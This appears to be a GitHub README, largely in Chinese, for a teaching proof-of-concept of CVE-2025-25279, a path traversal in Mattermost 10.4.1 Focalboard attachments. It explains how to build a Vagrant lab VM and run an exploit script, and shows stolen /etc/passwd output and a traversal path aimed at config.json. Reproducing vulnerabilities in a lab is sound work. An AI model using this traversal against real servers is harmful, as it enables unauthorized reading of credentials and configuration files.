Abokor-creator/CVE-2025-25279-Mattermost-Path-Traversal

GitHub: Abokor-creator/CVE-2025-25279-Mattermost-Path-Traversal

针对 Mattermost 10.4.1 Focalboard 模块路径遍历漏洞(CVE-2025-25279)的概念验证项目,包含一键靶机环境和利用脚本,可复现已认证用户通过附件功能读取服务器任意文件的过程。

Stars: 0 | Forks: 0

# 🔥 CVE-2025-25279 — Mattermost 10.4.1 ## 📤 Focalboard 中的路径遍历漏洞允许文件窃取 ## 🌟 概述 此概念验证演示了影响 **Mattermost 10.4.1** 的 **CVE-2025-25279** 漏洞的利用过程。 **Focalboard**(看板管理模块)中的一个缺陷允许通过 **attachments(附件)中的 path traversal(路径遍历)** 进行**任意文件读取**。 该 exploit(漏洞利用程序)可用于窃取: - `/etc/passwd` - `/etc/group` - 或 Mattermost 的敏感文件,例如: `opt/mattermost/config/config.json` 该攻击**仅在易受攻击的场景中通过已认证的用户账户**进行。 ## 🗂️ 目录结构 - **📁 target**:创建目标 box 的目录 - **📁 live**:创建目标虚拟机及演示 exploit 的目录 - **📁 src**:辅助源代码(如有) - **📁 refs**:包含文章和参考书的目录 - **📁 docs**:项目期间生成的相关文档,包括视频录像 ## 🔧 前提条件 - **Vagrant** - **VirtualBox** - **项目文件集(target + live)** - **Mattermost 账户(PAT = Personal Access Token,个人访问令牌)** - 带有 Bash 的 Linux/Mac/Windows # 📦 下载 Mattermost 未包含 `target/` 目录(对于 GitHub 而言体积过大)。 请手动下载: https://releases.mattermost.com/10.4.1/mattermost-10.4.1-linux-amd64.tar.gz ## 然后将文件放置在:*target* ## 在部署虚拟机之前 首先进入 target 目录并执行: ``` cd target make mattermost.box ``` 请确保您拥有 mattermost-poc box,否则虚拟机将无法运行: ``` cd cve-2025-25279-mattermost vagrant box add mattermost-poc target/mattermost.box ``` ## 1. 部署易受攻击的机器 #### 启动虚拟机 ``` cd live/vm1 vagrant up ``` 连接到虚拟机 ``` vagrant ssh ``` #### 在 Web 界面中创建用户: 打开:http://localhost:8065 #### 在 UI(用户界面)中创建 token(令牌): **Profile(个人资料) --> Security(安全) --> Personal Access Tokens(个人访问令牌)** ### 2. 安装 exploit(漏洞利用程序) 从宿主机执行: ``` cd live/share sudo apt-get update -y sudo apt-get install -y unzip chmod +x exploit.sh ``` ### 3. 运行 exploit(漏洞利用程序) ``` ./exploit.sh ``` 系统将提示您: ``` PAT (Personal Access Token) : ``` 👉 输入有效的 Mattermost 用户的 PAT。 📸 输出示例(窃取 /etc/passwd) ``` ===== CONTENU (début) ===== root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin ... mattermost:x:999:996::/opt/mattermost:/bin/sh ``` **目标文件:config.json** 要定位 Mattermost 敏感文件: 修改 exploit.sh 脚本顶部的: ``` TARGET_SUFFIX="opt/mattermost/config/config.json" TRAVERSAL_PATH='../../../../../../../opt/mattermost/config/config.json' L’exploit affichera alors le contenu du fichier config.json. ``` ## ✒️ 作者 🟢 **MAHAMMAD MOUSSE Abokor** 🔵 **PARNET cyril** 🎬 **视频演示** 👉 完整的视频演示位于: live/Démonstration/video-poc-cve-2025-25279.mp4 🧩 注意事项 此 PoC 严格用于学习环境。 切勿在教学环境之外或未经授权的情况下使用。
标签:CISA项目, CVE-2025-25279, Focalboard, Mattermost, PoC, Vagrant, VirtualBox, Web安全, XXE攻击, 任意文件读取, 应用安全, 文件泄露, 暴力破解, 漏洞复现, 网络安全, 网络安全审计, 蓝队分析, 路径遍历, 配置修复, 隐私保护